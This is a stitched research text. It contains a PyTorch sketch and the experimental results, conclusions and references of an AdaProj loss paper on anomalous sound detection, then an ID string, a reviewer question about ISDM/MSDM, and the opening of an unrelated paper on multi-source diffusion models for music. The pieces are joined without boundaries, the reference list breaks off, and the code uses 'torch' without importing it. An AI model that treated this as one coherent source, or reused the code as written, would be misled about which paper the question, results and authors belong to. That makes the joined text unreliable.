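import torch.nn.functional as F

class AdaProjLoss(torch.nn.Module):
    """Sketch of the AdaProj loss (Definition 1). Centers are randomly
    initialized and frozen (Section 3.2 uses Glorot uniform initialization;
    here we draw them on the unit sphere for simplicity). For large D they
    are approximately orthonormal (Gorban et al., 2016)."""

    def __init__(self, num_classes: int, subspace_dim: int, embed_dim: int,
                 s_hat: float = 16.0):  # fixed scale stands in for the adaptive AdaCos scale
        super().__init__()
        assert subspace_dim < embed_dim, "ensure |C_k| < D (see the Remark above)"
        centers = F.normalize(torch.randn(num_classes, subspace_dim, embed_dim), dim=-1)
        self.register_buffer("centers", centers)  # frozen: no gradient updates
        self.s_hat = s_hat

    def forward(self, x: torch.Tensor, labels: torch.Tensor) -> torch.Tensor:
        x = F.normalize(x, dim=-1)                      # P_{S^{D-1}}(x)
        # P_{span(C_k)}(x) = sum_j <x, c_{k,j}> c_{k,j} for every class k
        coeff = torch.einsum("bd,kjd->bkj", x, self.centers)
        proj = torch.einsum("bkj,kjd->bkd", coeff, self.centers)
        proj = F.normalize(proj, dim=-1)                # back onto the unit sphere
        dist = ((x.unsqueeze(1) - proj) ** 2).sum(-1)   # = 2 * (1 - cos), cf. the Remark
        logits = -self.s_hat * dist                     # smaller distance -> larger logit
        return F.cross_entropy(logits, labels)
```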
### 3 EXPERIMENTAL RESULTS

To experimentally evaluate the proposed AdaProj loss, first the experimental setup is presented by describing the datasets and the ASD system. After that, experimental results regarding the performance obtained with different loss functions, the impact of the subspace dimension, and the relation to state-of-the-art systems are presented and discussed.

#### 3.1 DATASETS AND PERFORMANCE METRICS

For the experiments, two ASD datasets were used, namely the DCASE2022 ASD dataset (Dohi et al., 2022a) and the DCASE2023 ASD dataset (Dohi et al., 2023) for semi-supervised machine condition monitoring. Both datasets consist of a development set and an evaluation set, each divided into a training split containing only normal data and a test split containing normal as well as anomalous data. Furthermore, both tasks explicitly capture the problem of domain generalization (Wang et al., 2021) by defining a source domain and a target domain, which differs from the source domain through altered machine parameters or noise conditions. The task is to detect anomalous samples regardless of the domain a sample belongs to by training a system with only normal data. As meta information, the target machine type of each sample is known; for the training samples, the domain and additional parameter settings or noise conditions, called attribute information, are also known and can thus be utilized to train an embedding model.

The DCASE2022 ASD dataset (Dohi et al., 2022a) consists of the machine types “ToyCar” and “ToyTrain” from ToyADMOS2 (Harada et al., 2021) and “fan”, “gearbox”, “bearing”, “slide rail”, and “valve” from MIMII-DG (Dohi et al., 2022b). For each machine type, there are six so-called sections, indicating different machine IDs of these types, of which three belong to the development set and three belong to the evaluation set. These IDs are known for each recording and can also be utilized as meta information to train the system. For the source domain of each section, there are 1000 normal audio recordings with a duration of 10 s and a sampling rate of 16 kHz belonging to the training split, and 50 normal and 50 anomalous samples belonging to the test split. For the target domain of each section, there are also approximately 50 normal and 50 anomalous samples belonging to the test split, but only 10 normal audio recordings belonging to the training split.

The DCASE2023 ASD dataset (Dohi et al., 2023) is similar to the DCASE2022 ASD dataset with the following modifications. First of all, the development set and the evaluation set contain mutually exclusive machine types. More concretely, the development set contains the same machine types as the DCASE2022 dataset, and the evaluation set contains the machine types “ToyTank”, “ToyNscale”, and “ToyDrone” from ToyADMOS2+ (Harada et al., 2023b) and “vacuum”, “bandsaw”, “grinder”, and “shaker” from MIMII-DG (Dohi et al., 2022b). Furthermore, there is only a single section for each machine type, which makes the auxiliary classification task much easier and results in less informative embeddings for the ASD task. Last but not least, each recording has a duration between 6 s and 18 s.
Overall, all three modifications make this task much more challenging than the DCASE2022 ASD task.

To measure the performance of the ASD systems, the threshold-independent area under the receiver operating characteristic (ROC) curve (AUC) is used. In addition, the partial area under the ROC curve (pAUC) (McClish, 1989) is used, which is the AUC for low false positive rates ranging from 0 to \( p = 0.1 \) in this case. The reason for incorporating the pAUC is that, for machine condition monitoring, one is interested in ensuring a low false alarm rate so that users do not lose trust in the system and keep taking alarms seriously. Both performance metrics are computed domain-independently for every previously defined section of the dataset, and the harmonic mean of all resulting values is the final score used to measure and compare the performances of different ASD systems.

#### 3.2 ANOMALOUS SOUND DETECTION SYSTEM

For all experiments conducted in this work, the state-of-the-art ASD system presented in Wilkinghoff (2023a) is used. An overview of the system can be found in Figure 1. The system consists of three main components: 1) a feature extractor, 2) an embedding model, and 3) a backend for computing anomaly scores. In the first processing block, two different feature representations are extracted from the raw waveforms, namely magnitude spectrograms and the full magnitude spectrum. To make the two feature representations more complementary, the temporal mean is subtracted from the magnitude spectrograms, essentially removing static frequency information, which is captured with the highest possible resolution in the magnitude spectra. Utilizing both of these representations was shown to significantly improve the performance (Wilkinghoff, 2023a) despite their close relation. For each of the two feature representations, a separate convolutional subnetwork is trained, and the resulting embeddings are concatenated and normalized with respect to the Euclidean norm to obtain a single embedding. In contrast to the original architecture, the embedding dimension is doubled from 256 to 512. More details about the subnetwork architectures can be found in Wilkinghoff (2023a).

The network is trained for 10 epochs with a batch size of 64 using Adam (Kingma & Ba, 2015), utilizing meta information such as machine types and the provided attribute information as an auxiliary classification task. Different loss functions can be used for this purpose and will be compared in the next subsection. All loss functions investigated in this work require class-specific center vectors, which are initialized randomly using Glorot uniform initialization (Glorot & Bengio, 2010). To improve the resulting ASD performance, the randomly initialized class centers are not adapted during training and no bias terms are used, as proposed in Ruff et al. (2018) for deep one-class classification. Furthermore, mixup (Zhang et al., 2018) with a uniformly distributed mixing coefficient is applied to the waveforms. As a backend, k-means with 32 means is applied to the normal training samples of the source domain. For a given test sample, the smallest cosine distance to these means and to the ten normal training samples of the target domain is used as an anomaly score. Thus, smaller values indicate normal samples whereas higher values indicate anomalous samples.
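As an illustration of this backend, the following sketch (our own; function and variable names are assumptions, not from the paper) computes the anomaly score of a single test embedding from the k-means centers of the source-domain training embeddings and the normal target-domain training embeddings:

```python
import numpy as np
from sklearn.cluster import KMeans

def anomaly_score(test_emb, source_embs, target_embs, n_means=32):
    """Smallest cosine distance from `test_emb` to the 32 k-means centers of
    the source domain and to the (ten) normal target-domain training
    embeddings. All embeddings are assumed to be L2-normalized."""
    # In practice the k-means centers would be fitted once, not per test sample.
    centers = KMeans(n_clusters=n_means, n_init=10).fit(source_embs).cluster_centers_
    centers /= np.linalg.norm(centers, axis=1, keepdims=True)
    references = np.concatenate([centers, target_embs], axis=0)
    cosine_dist = 1.0 - references @ test_emb   # 1 - cosine similarity
    return float(cosine_dist.min())             # small -> normal, large -> anomalous

# Evaluation sketch: AUC and pAUC (McClish, 1989) with p = 0.1, e.g. via
# sklearn.metrics.roc_auc_score(labels, scores) and
# sklearn.metrics.roc_auc_score(labels, scores, max_fpr=0.1).
```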
Table 1: ASD performance obtained with different loss functions. Harmonic means of all AUCs and pAUCs over all pre-defined sections of the dataset are depicted in percent. Arithmetic mean and standard deviation of the results over ten independent trials are shown. Best results in each column are highlighted with bold letters.

**DCASE2022 development set (Dohi et al., 2022a)**

| loss function | source AUC | source pAUC | target AUC | target pAUC | dom.-ind. AUC | dom.-ind. pAUC |
|---|---|---|---|---|---|---|
| intra-class (IC) compactness loss (Ruff et al., 2018) | 81.8 ± 1.6 | 74.9 ± 1.7 | 75.3 ± 1.0 | 63.4 ± 0.6 | 79.2 ± 0.9 | 64.7 ± 1.1 |
| IC compactness loss + CCE (Perera & Patel, 2019) | 82.5 ± 1.8 | 75.5 ± 0.9 | 75.5 ± 0.7 | 61.6 ± 0.9 | 79.0 ± 0.8 | 65.0 ± 0.7 |
| AdaCos loss (Zhang et al., 2019) | 82.6 ± 1.4 | 76.0 ± 1.1 | 76.5 ± 1.2 | 62.3 ± 1.4 | 79.8 ± 0.7 | 65.5 ± 0.9 |
| sub-cluster AdaCos loss (Wilkinghoff, 2021) | 83.2 ± 2.1 | 75.9 ± 1.3 | 77.6 ± 1.0 | 62.1 ± 1.5 | 80.0 ± 1.4 | 65.2 ± 1.1 |
| proposed AdaProj loss | **84.3 ± 1.1** | **76.3 ± 1.1** | **77.2 ± 1.2** | **62.2 ± 1.1** | **80.6 ± 0.8** | **65.5 ± 1.3** |

**DCASE2022 evaluation set (Dohi et al., 2022a)**

| loss function | source AUC | source pAUC | target AUC | target pAUC | dom.-ind. AUC | dom.-ind. pAUC |
|---|---|---|---|---|---|---|
| IC compactness loss (Ruff et al., 2018) | 74.7 ± 0.9 | 64.2 ± 1.3 | 65.9 ± 0.8 | 57.8 ± 0.9 | 70.3 ± 0.8 | 58.9 ± 0.8 |
| IC compactness loss + CCE (Perera & Patel, 2019) | 75.6 ± 0.7 | 66.9 ± 0.8 | 69.3 ± 0.7 | 59.3 ± 0.7 | 72.6 ± 0.4 | 60.3 ± 0.7 |
| AdaCos loss (Zhang et al., 2019) | 77.2 ± 0.5 | 65.9 ± 1.4 | 68.6 ± 1.1 | 58.6 ± 0.7 | 73.0 ± 0.4 | 59.7 ± 0.6 |
| sub-cluster AdaCos loss (Wilkinghoff, 2021) | 77.0 ± 0.7 | 66.5 ± 0.9 | 68.3 ± 0.8 | 58.8 ± 0.6 | 72.9 ± 0.6 | 59.5 ± 0.5 |
| proposed AdaProj loss | **77.4 ± 1.0** | **67.0 ± 0.6** | **69.7 ± 0.6** | **59.6 ± 0.6** | **73.6 ± 0.7** | **60.5 ± 0.7** |

**DCASE2023 development set (Dohi et al., 2023)**

| loss function | source AUC | source pAUC | target AUC | target pAUC | dom.-ind. AUC | dom.-ind. pAUC |
|---|---|---|---|---|---|---|
| IC compactness loss (Ruff et al., 2018) | 67.0 ± 2.1 | 62.4 ± 1.0 | 69.1 ± 1.4 | **56.4 ± 1.1** | 67.7 ± 1.2 | 56.9 ± 0.9 |
| IC compactness loss + CCE (Perera & Patel, 2019) | 70.6 ± 1.8 | 64.9 ± 1.8 | 71.2 ± 1.4 | 55.5 ± 1.6 | 70.4 ± 1.0 | **57.4 ± 1.1** |
| AdaCos loss (Zhang et al., 2019) | 70.7 ± 1.3 | 64.3 ± 1.1 | 71.2 ± 1.1 | 55.4 ± 1.3 | 70.9 ± 0.9 | 56.8 ± 0.9 |
| sub-cluster AdaCos loss (Wilkinghoff, 2021) | 68.5 ± 1.7 | 62.0 ± 1.3 | 67.8 ± 1.5 | 53.9 ± 1.5 | 70.4 ± 0.9 | 56.3 ± 0.8 |
| proposed AdaProj loss | 70.3 ± 1.7 | 61.8 ± 1.6 | **72.2 ± 1.4** | 55.1 ± 1.1 | **71.4 ± 1.0** | 56.2 ± 0.7 |

**DCASE2023 evaluation set (Dohi et al., 2023)**

| loss function | source AUC | source pAUC | target AUC | target pAUC | dom.-ind. AUC | dom.-ind. pAUC |
|---|---|---|---|---|---|---|
| IC compactness loss (Ruff et al., 2018) | 73.5 ± 1.8 | 63.4 ± 1.8 | 58.8 ± 2.5 | 55.7 ± 1.3 | 64.0 ± 1.5 | 55.8 ± 0.9 |
| IC compactness loss + CCE (Perera & Patel, 2019) | 74.3 ± 1.5 | **64.0 ± 1.6** | 61.6 ± 2.0 | 55.7 ± 0.9 | 67.5 ± 0.8 | 57.5 ± 1.0 |
| AdaCos loss (Zhang et al., 2019) | **74.7 ± 1.5** | 63.8 ± 1.8 | 61.6 ± 3.4 | 57.1 ± 1.4 | 68.0 ± 1.6 | 58.0 ± 1.1 |
| sub-cluster AdaCos loss (Wilkinghoff, 2021) | 73.2 ± 1.9 | 61.6 ± 1.4 | 62.0 ± 2.2 | 55.8 ± 1.3 | 66.5 ± 1.6 | 56.2 ± 1.0 |
| proposed AdaProj loss | 74.2 ± 1.8 | 62.9 ± 1.0 | **64.4 ± 2.0** | **57.7 ± 0.8** | **69.8 ± 1.3** | **60.0 ± 0.5** |

**Arithmetic mean over all datasets**

| loss function | source AUC | source pAUC | target AUC | target pAUC | dom.-ind. AUC | dom.-ind. pAUC |
|---|---|---|---|---|---|---|
| IC compactness loss (Ruff et al., 2018) | 74.3 | 66.2 | 67.3 | 58.3 | 70.3 | 59.1 |
| IC compactness loss + CCE (Perera & Patel, 2019) | 75.8 | **67.6** | 69.4 | 58.0 | 72.4 | 60.1 |
| AdaCos loss (Zhang et al., 2019) | 76.3 | 67.5 | 69.5 | 58.4 | 72.9 | 60.0 |
| sub-cluster AdaCos loss (Wilkinghoff, 2021) | 75.4 | 66.5 | 69.9 | 58.1 | 72.5 | 59.3 |
| proposed AdaProj loss | **76.6** | 66.3 | **70.9** | **58.7** | **73.9** | **60.6** |
#### 3.3 Performance Evaluation

The first and most important experiment is to compare different loss functions for training the embedding extractor of the ASD system presented in the previous subsection. For this purpose, we used 1) individual class-specific IC compactness losses jointly trained on all classes, as proposed for one-class classification in Ruff et al. (2018), 2) an additional discriminative CCE loss, similar to the descriptiveness loss used in Perera & Patel (2019) but trained on the same dataset, 3) the AdaCos loss (Zhang et al., 2019), 4) the sub-cluster AdaCos loss (Wilkinghoff, 2021) with 32 sub-clusters, and 5) the proposed AdaProj loss. The experiments were conducted on the development and evaluation splits of the DCASE2022 and DCASE2023 ASD datasets, and each experiment was repeated ten times to reduce the variance of the resulting performances. Furthermore, the arithmetic means of the performances obtained on the different datasets are shown, to allow a direct comparison of the overall performance. The results can be found in Table 1.

The main observation to be made is that the proposed AdaProj loss clearly outperforms all other losses on both datasets. Especially on the DCASE2023 dataset, significant improvements can be observed. The most likely explanation is that for this dataset the classification task is less difficult, so a few classes may be easily identified, leading to embeddings that do not carry enough information to distinguish between embeddings belonging to normal and anomalous samples of these classes. Another interesting observation is that, in contrast to the original results presented in Wilkinghoff (2021), the sub-cluster AdaCos loss actually performs slightly worse than the AdaCos loss despite having a larger solution space. A possible explanation is that in the original work the centers are adapted during training, whereas in our work they are not, as freezing them has been shown to improve the resulting performance (Wilkinghoff, 2023a). Since, upon random initialization, all centers have approximately the same distance to each other (the centers belonging to a target class as well as all other centers), the network will likely utilize only the single center of each class that is closest to the initial embeddings of the corresponding target class. Moreover, a low inter-class similarity is more difficult to ensure due to the higher total number of sub-clusters belonging to other classes. This leads to more restrictive requirements when learning class-specific distributions and thus actually reduces the ability to differentiate between embeddings belonging to normal and anomalous samples.

#### 3.4 Investigating the Impact of the Subspace Dimension on the Performance

As an ablation study, different choices for the dimension of the subspaces have been compared experimentally on the DCASE2023 ASD dataset. The results can be found in Figure 2.
It can be seen that, on the development set, the results are relatively stable, while a larger dimension slightly improves the performance on the evaluation set, without any significant differences. For subspace dimensions greater than 48, the performances seem to slightly degrade again. In conclusion, the subspace dimension should be neither too high nor too low, and a dimension of 32, as used for the other experiments in this work, appears to be a reasonable choice.

#### 3.5 Comparison to Other Published Systems

As a last experiment, the performance of the proposed system using AdaProj is compared to the ten top-performing systems of the DCASE2023 Challenge. As many systems utilize ensembles of models, the mean of the anomaly scores of ten independent trials was used to create an ensemble of ten systems, allowing a fair comparison. The results can be found in Figure 3. It can be seen that the proposed system outperforms all other published systems and thus achieves a new state-of-the-art performance. This adds confidence to the benefits of the AdaProj loss function.

### 4 CONCLUSIONS AND FUTURE WORK

In this work, AdaProj, a novel angular margin loss function specifically designed for semi-supervised anomaly detection with auxiliary classification tasks, was presented. It was proven that this loss function learns an embedding space with class-specific subspaces of arbitrary dimension. In contrast to other angular margin losses, which try to project data to individual points in space, this relaxes the requirements for solving the classification task and allows for less compact distributions in the embedding space. In experiments conducted on the DCASE2022 and DCASE2023 ASD datasets, it was shown that using AdaProj results in better performance than other commonly used loss functions. In conclusion, the resulting embedding space has a more desirable structure for differentiating between normal and anomalous samples than the other embedding spaces. As a result, a new state-of-the-art performance, outperforming all other published systems, could be achieved on the DCASE2023 ASD dataset. For future work, it is planned to evaluate AdaProj on other datasets and with other auxiliary classification tasks, e.g., tasks imposed by SSL.

### REFERENCES

Charu Aggarwal. Outlier Analysis. Springer, 2nd edition, 2017.

Han Chen, Yan Song, Zhu Zhuo, Yu Zhou, Yu-Hong Li, Hui Xue, and Ian McLoughlin. An effective anomalous sound detection method based on representation learning with simulated anomalies. In International Conference on Acoustics, Speech and Signal Processing (ICASSP). IEEE, 2023.

Jiankang Deng, Jia Guo, Niannan Xue, and Stefanos Zafeiriou. ArcFace: Additive angular margin loss for deep face recognition. In Conference on Computer Vision and Pattern Recognition (CVPR), pp. 4690–4699. IEEE, 2019.

Yufeng Deng, Anbai Jiang, Yuchen Duan, Jitao Ma, Xuchu Chen, Jia Liu, Pingyi Fan, Cheng Lu, and Wei-Qiang Zhang. Ensemble of multiple anomalous sound detectors. In 7th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE). Tampere University, 2022.

Kota Dohi, Keisuke Imoto, Noboru Harada, Daisuke Niizumi, Yuma Koizumi, Tomoya Nishida, Harsh Purohit, Ryo Tanabe, Takashi Endo, Masaaki Yamamoto, and Yohei Kawaguchi. Description and discussion on DCASE 2022 challenge task 2: Unsupervised anomalous sound detection for machine condition monitoring applying domain generalization techniques. In 7th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE), pp. 26–30. Tampere University, 2022a.
Kota Dohi, Tomoya Nishida, Harsh Purohit, Ryo Tanabe, Takashi Endo, Masaaki Yamamoto, Yuki Nikaido, and Yohei Kawaguchi. MIMII DG: sound dataset for malfunctioning industrial machine investigation and inspection for domain generalization task. In 7th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE), pp. 26–30. Tampere University, 2022b.

Kota Dohi, Keisuke Imoto, Noboru Harada, Daisuke Niizumi, Yuma Koizumi, Tomoya Nishida, Harsh Purohit, Ryo Tanabe, Takashi Endo, and Yohei Kawaguchi. Description and discussion on DCASE 2023 challenge task 2: First-shot unsupervised anomalous sound detection for machine condition monitoring. In 8th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE), pp. 31–35. Tampere University, 2023.

Ritwik Giri, Srikanth V. Tenneti, Fangzhou Cheng, Karim Helwani, Umut Isik, and Arvindh Krishnaswamy. Self-supervised classification for detecting anomalous sounds. In Detection and Classification of Acoustic Scenes and Events Workshop (DCASE), pp. 46–50, 2020.

Xavier Glorot and Yoshua Bengio. Understanding the difficulty of training deep feedforward neural networks. In Thirteenth International Conference on Artificial Intelligence and Statistics (AISTATS), volume 9 of JMLR Proceedings, pp. 249–256. JMLR.org, 2010.

Alexander N. Gorban, Ivan Yu. Tyukin, Danil V. Prokhorov, and Konstantin I. Sofeikov. Approximation with random bases: Pro et contra. Information Sciences, 364-365:129–145, 2016.

Noboru Harada, Daisuke Niizumi, Daiki Takeuchi, Yasunori Ohishi, Masahiro Yasuda, and Shoichiro Saito. ToyADMOS2: Another dataset of miniature-machine operating sounds for anomalous sound detection under domain shift conditions. In 6th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE), pp. 1–5, 2021.

Noboru Harada, Daisuke Niizumi, Daiki Takeuchi, Yasunori Ohishi, and Masahiro Yasuda. First-shot anomaly detection for machine condition monitoring: A domain generalization baseline. In 31st European Signal Processing Conference (EUSIPCO). IEEE, 2023a.

Noboru Harada, Daisuke Niizumi, Daiki Takeuchi, Yasunori Ohishi, and Masahiro Yasuda. ToyADMOS2+: New ToyADMOS data and benchmark results of the first-shot anomalous sound event detection baseline. In 8th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE), pp. 41–45. Tampere University, 2023b.

Dan Hendrycks, Mantas Mazeika, and Thomas G. Dietterich. Deep anomaly detection with outlier exposure. In 7th International Conference on Learning Representations (ICLR). OpenReview.net, 2019.

Tadanobu Inoue, Phongtharin Vinayavekhin, Shu Morikuni, Shiqiang Wang, Tuan Hoang Trong, David Wood, Michiaki Tatsubori, and Ryuki Tachibana. Detection of anomalous sounds for machine condition monitoring using classification confidence. In 5th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE), pp. 66–70, 2020.

Sergey Ioffe and Christian Szegedy. Batch normalization: Accelerating deep network training by reducing internal covariate shift. In 32nd International Conference on Machine Learning (ICML), volume 37, pp. 448–456, 2015.

Wang JiaJun. Self-supervised representation learning for first-shot unsupervised anomalous sound detection. Technical report, DCASE2023 Challenge, June 2023.

Anbai Jiang, Qijun Hou, Jia Liu, Pingyi Fan, Jitao Ma, Cheng Lu, Yuanzhi Zhai, Yufeng Deng, and Wei-Qiang Zhang. THUEE system for first-shot unsupervised anomalous sound detection for machine condition monitoring. Technical report, DCASE2023 Challenge, 2023.
Wang Junjie, Wang Jiajun, Chen Shengbing, Sun Yong, and Liu Mengyuan. Anomalous sound detection based on self-supervised learning. Technical report, DCASE2023 Challenge, 2023.

Yohei Kawaguchi, Keisuke Imoto, Yuma Koizumi, Noboru Harada, Daisuke Niizumi, Kota Dohi, Ryo Tanabe, Harsh Purohit, and Takashi Endo. Description and discussion on DCASE 2021 challenge task 2: Unsupervised anomalous sound detection for machine condition monitoring under domain shifted conditions. In Detection and Classification of Acoustic Scenes and Events Workshop (DCASE), pp. 186–190, 2021.

Diederik P. Kingma and Jimmy Ba. Adam: A method for stochastic optimization. In Yoshua Bengio and Yann LeCun (eds.), 3rd International Conference on Learning Representations (ICLR), 2015.

Yuma Koizumi, Yohei Kawaguchi, Keisuke Imoto, Toshiki Nakamura, Yuki Nikaido, Ryo Tanabe, Harsh Purohit, Kaori Suefusa, Takashi Endo, Masahiro Yasuda, and Noboru Harada. Description and discussion on DCASE2020 challenge task2: Unsupervised anomalous sound detection for machine condition monitoring. In 5th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE), pp. 81–85, 2020.

Ibuki Kuroyanagi, Tomoki Hayashi, Yusuke Adachi, Takenori Yoshimura, Kazuya Takeda, and Tomoki Toda. An ensemble approach to anomalous sound detection based on conformer-based autoencoder and binary classifier incorporated with metric learning. In 6th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE), pp. 110–114, 2021.

Lijian Li, Yunhe Zhang, and Aiping Huang. Learnable subspace orthogonal projection for semi-supervised image classification. In 16th Asian Conference on Computer Vision (ACCV), volume 13843 of Lecture Notes in Computer Science, pp. 477–490. Springer, 2022.

Jose A. Lopez, Hong Lu, Paulo Lopez-Meyer, Lama Nachman, Georg Stemmer, and Jonathan Huang. A speaker recognition approach to anomaly detection. In 5th Detection and Classification of Acoustic Scenes and Events Workshop (DCASE), pp. 96–99, 2020.

Jose A. Lopez, Georg Stemmer, Paulo Lopez-Meyer, Pradyumna Singh, Juan A. del Hoyo Ontiveros, and Héctor A. Cordourier. Ensemble of complementary anomaly detectors under domain shifted conditions. In 6th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE), pp. 11–15, 2021.

Zhiqiang Lv, Bing Han, Zhengyang Chen, Yanmin Qian, Jiawei Ding, and Jia Liu. Unsupervised anomalous detection based on unsupervised pretrained models. Technical report, DCASE2023 Challenge, 2023.

Donna Katzman McClish. Analyzing a portion of the ROC curve. Medical Decision Making, 9(3):190–195, 1989.

Tomoya Nishida, Kota Dohi, Takashi Endo, Masaaki Yamamoto, and Yohei Kawaguchi. Anomalous sound detection based on machine activity detection. In 30th European Signal Processing Conference (EUSIPCO), pp. 269–273. IEEE, 2022.

Pramuditha Perera and Vishal M. Patel. Learning deep features for one-class classification. IEEE Transactions on Image Processing, 28(11):5450–5463, 2019.

Paul Primus, Verena Haunschmid, Patrick Praher, and Gerhard Widmer. Anomalous sound detection as a simple binary classification problem with careful selection of proxy outlier examples. In 5th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE), pp. 170–174, 2020.

Lukas Ruff, Nico Görnitz, Lucas Deecke, Shoaib Ahmed Siddiqui, Robert A. Vandermeulen, Alexander Binder, Emmanuel Müller, and Marius Kloft. Deep one-class classification. In 35th International Conference on Machine Learning (ICML), volume 80 of Proceedings of Machine Learning Research, pp. 4390–4399. PMLR, 2018.
Jiantong Tian, Hejing Zhang, Qiaoxi Zhu, Feiyang Xiao, Haohe Liu, Xinhao Mei, Youde Liu, Wenwu Wang, and Jian Guan. First-shot anomalous sound detection with GMM clustering and finetuned attribute classification using audio pretrained model. Technical report, DCASE2023 Challenge, 2023.

Satvik Venkatesh, Gordon Wichern, Aswin Shanmugam Subramanian, and Jonathan Le Roux. Improved domain generalization via disentangled multi-task learning in unsupervised anomalous sound detection. In 7th Workshop on Detection and Classification of Acoustic Scenes and Events (DCASE), pp. 196–200. Tampere University, 2022.

Feng Wang, Jian Cheng, Weiyang Liu, and Haijun Liu. Additive margin softmax for face verification. IEEE Signal Processing Letters, 25(7):926–930, 2018.
h922Qhkmx1
Q1: The separation results of ISDM and MSDM in Table 2 suggest a trade-off between generation quality and separation performance. Is this confirmed? If so, why use a unified approach for source separation and generation? I understand that, on the one hand, ISDM helps to show that the diffusion method is comparable to the SOTA method. However, since MSDM is always lower than ISDM, I doubt that the fundamental assumption of this paper, namely that it is superior to use a joint distribution to model generation and separation at the same time, is valid.
MULTI-SOURCE DIFFUSION MODELS FOR SIMULTANEOUS MUSIC GENERATION AND SEPARATION

Giorgio Mariani∗ Sapienza University of Rome [email protected]
Emilian Postolache∗ Sapienza University of Rome [email protected]
Luca Cosmo† Ca’ Foscari University of Venice [email protected]
Irene Tallini∗ Sapienza University of Rome [email protected]
Michele Mancusi∗ Sapienza University of Rome [email protected]
Emanuele Rodolà† Sapienza University of Rome [email protected]

ABSTRACT

In this work, we define a diffusion-based generative model capable of both music synthesis and source separation by learning the score of the joint probability density of sources sharing a context. Alongside the classic total inference tasks (i.e., generating a mixture, separating the sources), we also introduce and experiment on the partial generation task of source imputation, where we generate a subset of the sources given the others (e.g., play a piano track that goes well with the drums). Additionally, we introduce a novel inference method for the separation task based on Dirac likelihood functions. We train our model on Slakh2100, a standard dataset for musical source separation, provide qualitative results in the generation settings, and showcase competitive quantitative results in the source separation setting. Our method is the first example of a single model that can handle both generation and separation tasks, thus representing a step toward general audio models.

### 1 INTRODUCTION

Generative models have recently gained much attention thanks to their successful application in many fields, such as NLP (OpenAI, 2023; Touvron et al., 2023; Santilli et al., 2023), image synthesis (Ramesh et al., 2022; Rombach et al., 2022), and protein design (Shin et al., 2021; Weiss et al., 2023; Minello et al., 2024). Audio is no exception to this trend (Agostinelli et al., 2023; Liu et al., 2023). A peculiarity of the audio domain is that an audio sample $y$ can be seen as the sum of multiple individual sources $\{x_1, \ldots, x_N\}$, resulting in a mixture $y = \sum_{n=1}^{N} x_n$. Unlike in other sub-fields of the audio domain (e.g., speech), the sources present in musical mixtures (stems) share a context given their strong interdependence. For example, the bass line of a song follows the drum’s rhythm and harmonizes with the melody of the guitar. Mathematically, this fact can be expressed by saying that the joint distribution of the sources \( p(x_1, \ldots, x_N) \) does not factorize into the product of individual source distributions \( \{p_n(x_n)\}_{n=1,\ldots,N} \).

---
∗Equal contribution. Listing order is random. G.M. wrote most of the code, performed most objective experiments, and contributed to the development of the Dirac separator. I.T. proposed and developed the idea of the Dirac separator and partly formalized its proof, contributed to the code and the objective experiments, especially concerning the Dirac separator, performed the subjective listening tests, and wrote substantial parts of the paper. E.P. proposed and developed the ideas of the source-joint Bayesian separator and the sub-FAD metric, partly formalized the proof of the Dirac separator, contributed to the code and the objective experiments, especially concerning source imputation, and wrote substantial parts of the paper. M.M. proposed the idea of using the source-joint model for music (and accompaniment) generation, proposed using the correction steps, and contributed to the objective experiments.
†Shared last authorship.
Knowing the joint \( p(x_1, \ldots, x_N) \) implies knowing the distribution over the mixtures \( p(y) \), since the latter can be obtained through the sum. The converse is mathematically more difficult, being an inverse problem. Nevertheless, humans have developed the ability to process multiple sound sources simultaneously, in terms of both synthesis (i.e., musical composition or generation) and analysis (i.e., source separation). More specifically, composers can invent multiple sources \( \{x_1, \ldots, x_N\} \) that sum to a consistent mixture \( y \) and, conversely, extract information about the individual sources \( \{x_1, \ldots, x_N\} \) from a mixture \( y \). This ability to compose and decompose sound is crucial for a generative music model. A model designed to assist in music composition should be capable of isolating individual sources within a mixture and of allowing independent operation on each source. Such a capability would give the composer maximum control over what to modify and what to retain in a composition. Therefore, we argue that compositional (waveform) music generation is highly connected to music source separation.

To our knowledge, no model in the deep learning literature can perform both tasks simultaneously. Models designed for the generation task directly learn the distribution \( p(y) \) over mixtures, collapsing the information needed for the separation task. In this case, we have accurate mixture modeling but no information about the individual sources. It is worth noting that approaches that model the distribution of mixtures conditioned on textual data (Schneider et al., 2023; Agostinelli et al., 2023) face the same limitations. Conversely, models for source separation (Défossez et al., 2019) either target \( p(x_1, \ldots, x_N \mid y) \), conditioning on the mixture, or learn a single model \( p_n(x_n) \) for each source distribution (e.g., in a weakly-supervised manner) and condition on the mixture during inference (Jayaram & Thickstun, 2020; Postolache et al., 2023a). In both cases, generating mixtures is impossible. In the first case, the model inputs a mixture, which hinders the possibility of unconditional modeling, since it does not have direct access to \( p(x_1, \ldots, x_N) \) (or, equivalently, to \( p(y) \)). In the second case, while we can accurately model each source independently, all essential information about their interdependence is lost, preventing the possibility of generating coherent mixtures.

**Contribution.** Our contribution is three-fold. (i) First, we bridge the gap between source separation and music generation by learning \( p(x_1, \ldots, x_N) \), the joint (prior) distribution of contextual sources (i.e., those belonging to the same song). For this purpose, we use the denoising score-matching framework to train a Multi-Source Diffusion Model (MSDM). By training this single model, we can perform both source separation and music generation during inference. Specifically, generation is achieved by sampling from the prior, while separation is carried out by conditioning the prior on the mixture and then sampling from the resulting posterior distribution. (ii) This new formulation opens the door to novel tasks in the generative domain, such as source imputation, where we create accompaniments by generating a subset of the sources given the others (e.g., play a piano track that goes well with the drums).
(iii) Lastly, to obtain competitive results on source separation with respect to state-of-the-art regressor models (Manilow et al., 2022) on the Slakh2100 dataset (Manilow et al., 2019), we propose a new procedure for computing the posterior score based on Dirac delta functions, exploiting the functional relationship between the sources and the mixture.

### 2 RELATED WORK

#### 2.1 GENERATIVE MODELS FOR AUDIO

